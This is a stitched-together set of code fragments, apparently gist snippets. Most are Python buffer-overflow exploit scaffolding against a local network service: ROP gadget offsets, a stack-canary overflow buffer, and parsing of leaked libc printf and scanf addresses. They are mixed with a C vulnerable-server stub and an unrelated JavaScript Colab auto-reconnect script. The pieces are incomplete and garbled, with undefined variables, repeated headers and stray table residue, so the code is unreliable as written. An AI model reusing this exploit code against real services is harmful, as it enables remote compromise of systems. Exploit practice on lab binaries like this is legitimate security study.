#!/usr/bin/env python3 | |
from struct import pack,unpack | |
from threading import Thread | |
from telnetlib import Telnet | |
from time import sleep | |
import socket | |
import sys | |
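def p64(x):
    """Pack *x* as an unsigned 64-bit little-endian value (8 bytes)."""
    # "<Q" pins little-endian; a bare "Q" follows the host's native byte order
    # and alignment, which only happens to be little-endian on x86-64.
    return pack("<Q", x)


def u64(x):
    """Unpack exactly 8 little-endian bytes into an unsigned 64-bit integer."""
    return unpack("<Q", x)[0]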
# Locations inside the target image, each computed as BIN_BASE plus a fixed
# offset. NOTE(review): the offsets presumably match one specific build of the
# binary; BIN_BASE itself is defined outside the visible lines.
pop_rdi = BIN_BASE + 0x1643
pop_rsi_r15 = BIN_BASE + 0x1641
ret_gad = BIN_BASE + 0x1306
write_plt = BIN_BASE + 0x1060
write_got = BIN_BASE + 0x4030

# 200 filler bytes followed by the 8-byte packed CANARY value.
buf = b'A' * 200 + p64(CANARY)
#!/usr/bin/env python3 | |
from struct import pack,unpack | |
from threading import Thread | |
from telnetlib import Telnet | |
from time import sleep | |
import socket | |
import sys | |
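def p64(x):
    """Return *x* packed as 8 bytes, unsigned 64-bit, little-endian."""
    # An explicit "<" keeps the result little-endian on every host; plain "Q"
    # means native byte order, which the original comment did not account for.
    return pack("<Q", x)


def u64(x):
    """Return the unsigned 64-bit integer stored in 8 little-endian bytes."""
    return unpack("<Q", x)[0]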
#!/usr/bin/env python3 | |
import socket | |
# Service under test, as (host, port).
TRGT = ('192.168.0.6', 8888)

# 200 filler bytes plus one extra 'B'; per the author, that extra byte lands on
# the first byte of the stack canary.
buf = b'A' * 200 + b'B'

# IPv4 stream (TCP) socket, connected to the target right away.
s = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
s.connect(TRGT)
#include <stdio.h> | |
#include <stdlib.h> | |
#include <unistd.h> | |
#include <signal.h> | |
#include <string.h> | |
#include <sys/socket.h> | |
#include <netinet/in.h> | |
#include <arpa/inet.h> | |
void handle_request(int cfd){ |
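// Run in the browser console.

/**
 * Click the "#connect" control inside the colab-connect-button element.
 *
 * Logs and returns instead of throwing when the toolbar element, its shadow
 * root, or the inner button cannot be found (for example after a UI change),
 * so the periodic timer does not fill the console with TypeErrors.
 */
function ReconnectColab() {
    const host = document.querySelector("#top-toolbar > colab-connect-button");
    const button = host && host.shadowRoot && host.shadowRoot.querySelector("#connect");
    if (!button) {
        console.log("Reconnect button not found.");
        return;
    }
    button.click();
    console.log("Reconnect clicked.");
}

// Repeat every 120000 ms (two minutes).
setInterval(ReconnectColab, 120000);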
#!/usr/bin/env python3 | |
from struct import pack,unpack | |
from telnetlib import Telnet | |
import socket | |
import sys | |
# Address of the service under test, as (host, port).
TARGET = ("192.168.43.115", 5555)

# IPv4 stream (TCP) socket; the visible lines create it but do not connect it.
s = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
# Everything after the first "received." marker in the response is leak data.
leaks = resp.split(b"received.")[1]

# Two pointers arrive back to back, 6 bytes each (printf first, then
# __isoc99_scanf). Each is zero-padded to 8 bytes so u64() can unpack it.
printf_libc, scanf_libc = (
    u64(leaks[start:start + 6].ljust(8, b'\x00')) for start in (0, 6)
)

# Show both values in hex.
print("[*] Leaked libc printf:\t\t", hex(printf_libc))
print("[*] Leaked libc __isoc99_scanf:\t", hex(scanf_libc))
#!/usr/bin/env python3 | |
from struct import pack,unpack | |
from telnetlib import Telnet | |
import socket | |
import sys | |
# (host, port) of the service this script talks to.
TARGET = ("192.168.43.115", 5555)

# Plain TCP over IPv4; no connect() call appears in the visible lines.
s = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
#include <stdio.h> | |
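// Prompt for a message on stdin and acknowledge it.
//
// The message is read as one whitespace-delimited token into a 200-byte stack
// buffer. Nothing is printed after the prompt if no token could be read.
void getMessage()
{
    char msg[200];

    printf("Enter message: ");
    // Bound the read to the buffer: a bare "%s" keeps copying until whitespace,
    // so input longer than msg would write past it on the stack. The width is
    // sizeof(msg) - 1, leaving room for the terminating NUL that scanf appends.
    if (scanf("%199s", msg) != 1) {
        return; // EOF or read error: msg was not filled in
    }
    // do something.
    printf("The message has been received.");
}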